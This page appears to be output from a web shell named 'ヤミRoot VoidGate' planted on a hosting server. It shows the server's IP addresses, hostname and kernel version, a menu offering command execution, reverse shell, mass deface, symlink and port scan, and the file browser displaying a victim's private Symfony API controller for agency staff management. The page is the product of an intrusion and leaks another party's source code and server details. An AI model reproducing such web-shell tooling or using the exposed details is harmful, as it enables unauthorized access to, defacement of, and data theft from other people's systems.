ヤミRoot VoidGate
User / IP
:
216.73.216.137
Host / Server
:
146.88.233.70 / dev.loger.cm
System
:
Linux hybrid1120.fr.ns.planethoster.net 3.10.0-957.21.2.el7.x86_64 #1 SMP Wed Jun 5 14:26:44 UTC 2019 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
itrave
/
api
/
src
/
AppBundle
/
Controller
/
Api
/
Viewing: AgencyStaffController.php
<?php namespace AppBundle\Controller\Api; use Symfony\Bundle\FrameworkBundle\Controller\Controller; use FOS\RestBundle\Controller\Annotations as Rest; use Symfony\Component\HttpFoundation\Response; use Symfony\Component\HttpFoundation\JsonResponse; use Sensio\Bundle\FrameworkExtraBundle\Configuration\ParamConverter; use Nelmio\ApiDocBundle\Annotation as Doc; use FOS\RestBundle\Request\ParamFetcher; use Sensio\Bundle\FrameworkExtraBundle\Configuration\Security; use AppBundle\Entity\Agency; use AppBundle\Entity\Staff; class AgencyStaffController extends Controller { /** * Get the list of all staffs assigned to an agency ('agencyId' is the Id of the agency) * @param integer $agencyId The id of the agency * * @Rest\Get("/agencies/{agencyId}/staffs") * @Rest\View( * statusCode = Response::HTTP_OK, * SerializerGroups = {"STAFF_DETAILS"} * ) * @Doc\ApiDoc( * section="Staffs assigned to an agency", * resource=true, * description="Get the list of all staffs assigned to an agency.", * ) * @Security("has_role('ROLE_AGENCY_ADMIN')") */ public function listAction(Agency $agency) { //TODO return $agency->getStaffs(); } /** * Get one staff who is assigned to an agency ('agencyId' is the Id of the agency) * @param integer $agencyId The id of the agency * @param integer $id The id of the staff * @Rest\Get("/agencies/{agencyId}/staffs/{id}") * @Rest\View( * statusCode = Response::HTTP_OK, * SerializerGroups = {"LIST", "STAFF_DETAILS"} * ) * @Doc\ApiDoc( * section="Staffs assigned to an agency", * resource=true, * description="Get one staff who is assigned to an agency.", * ) * @Security("has_role('ROLE_AGENCY_ADMIN')") */ public function showAction(Staff $staff , Agency $agency ) { //TODO if( $staff->getCompany() != $agency->getCompany()){ return new JsonResponse(['error' => 'This staff and this agency are not from the same company '], Response::HTTP_METHOD_NOT_ALLOWED); } if( !$agency->getStaffs()->contains($staff) ){ return new JsonResponse(['error' => 'This staff is not assigned to this agency '], Response::HTTP_METHOD_NOT_ALLOWED); } return $staff; } /** * Assign a staff to a given agency.(the bus and the agency must already exist) * @param integer $agencyId The id of the agnecy * @param integer $id The id of the staff to be assigned to the agency * @Rest\Post("/agencies/{agencyId}/staffs/{id}") * @Rest\View( * statusCode= Response::HTTP_OK, * SerializerGroups = {"LIST", "STAFF_DETAILS"} *) * @Doc\ApiDoc( * section="Staffs assigned to an agency", * resource=true, * description="Assign a staff to a given agency.", * ) * @Rest\QueryParam( * name="is_manager", * requirements="(true|false)", * nullable=true, * description="Set to true if this staff must be the manager of the agency." * ) * @Security("has_role('ROLE_AGENCY_ADMIN')") */ public function addAction(ParamFetcher $paramFetcher, $agencyId, $id) { $em = $this ->getDoctrine() ->getManager(); $agency = $em->getRepository("AppBundle:Agency")->find($agencyId); $staff = $em->getRepository("AppBundle:Staff")->find($id); if( $agency == null OR $staff == null ){ return new JsonResponse(['error' => 'NOT FOUND '], Response::HTTP_NOT_FOUND); } if( $staff->getCompany() != $agency->getCompany()){ return new JsonResponse(['error' => 'This staff and this agency are not from the same company '], Response::HTTP_METHOD_NOT_ALLOWED); } // if($agency->getStaffs()->contains($staff)){ // return new JsonResponse('This staff is already assigned to this agency', Response::HTTP_CONFLICT); // } $isManager = $paramFetcher->get('is_manager'); $staff->setAgency($agency); if ($isManager) { $agency->setManager( $staff); $roles = $staff->getRoles(); if( ! in_array("ROLE_AGENCY_ADMIN", $roles)){ $roles[] = "ROLE_AGENCY_ADMIN"; $staff->setRoles($roles); } } $em->flush(); return $staff; } /** * Update the status of a staff in an agency.(Used only to make him become Manager or loose that privilege) * * @Rest\Put("/agencies/{agencyId}/staffs/{id}") * @Rest\View( * statusCode= Response::HTTP_OK, * SerializerGroups = {"LIST", "STAFF_DETAILS"} *) * @Rest\QueryParam( * name="is_manager", * requirements="(true|false)", * nullable=true, * description="Set to true if this staff must be the manager of the agency." * ) * @Doc\ApiDoc( * section="Staffs assigned to an agency", * resource=true, * description="set/unset a staff as the manager of the agency (the staff must have been previously assigned to the agency).", * ) * @Security("has_role('ROLE_AGENCY_ADMIN')") */ public function updateAction(ParamFetcher $paramFetcher, $agencyId, $id) { $em = $this ->getDoctrine() ->getManager(); $agency = $em->getRepository("AppBundle:Agency")->find($agencyId); $staff = $em->getRepository("AppBundle:Staff")->find($id); if( $agency == null OR $staff == null ){ return new JsonResponse(['error' => 'NOT FOUND '], Response::HTTP_NOT_FOUND); } $isManager = $paramFetcher->get('is_manager'); if( $staff->getAgency() != $agency) return new JsonResponse(['error' => 'This staff is not yet assigned to this agency '], Response::HTTP_METHOD_NOT_ALLOWED); if ($isManager == true) { $agency->setManager( $staff); $roles = $staff->getRoles(); if( ! in_array("ROLE_AGENCY_ADMIN", $roles)){ $roles[] = "ROLE_AGENCY_ADMIN"; $staff->setRoles($roles); } }elseif ($isManager == false) { $agency->setManager( null); $offset = array_search("ROLE_AGENCY_ADMIN",$staff->getRoles()); if($offset >= 0) { $roles = $staff->getRoles(); array_splice($roles , $offset, 1); $staff->setRoles($roles ); } } $em->flush(); return $agency; } /** * Delete the assignation of a staff to a given agency.(the bus and the agency must already exist) * @param integer $agencyId The id of the agnecy * @param integer $id The id of the staff who's assignation should be deleted * @Rest\Delete("/agencies/{agencyId}/staffs/{id}") * @Rest\View * @Doc\ApiDoc( * section="Staffs assigned to an agency", * resource=true, * description="Delete the assignation of a staff to a given agency.", * ) * @Security("has_role('ROLE_AGENCY_ADMIN')") */ public function deleteAction( $agencyId, $id) { $em = $this ->getDoctrine() ->getManager(); $agency = $em->getRepository("AppBundle:Agency")->find($agencyId); $staff = $em->getRepository("AppBundle:Staff")->find($id); if( $agency == null OR $staff == null ){ return new JsonResponse(['error' => 'NOT FOUND '], Response::HTTP_NOT_FOUND); } if( $staff->getCompany() != $agency->getCompany()){ return new JsonResponse(['error' => 'This staff and this agency are not from the same company '], Response::HTTP_METHOD_NOT_ALLOWED); } $staff->setAgency(null); if( $agency->getManager() == $staff){ $agency->setManager( null); $offset = array_search("ROLE_AGENCY_ADMIN",$staff->getRoles()); if($offset >= 0) { $roles = $staff->getRoles(); array_splice($roles , $offset, 1); $staff->setRoles($roles ); } } $em->flush(); return true; } }
Coded With 💗 by
0x6ick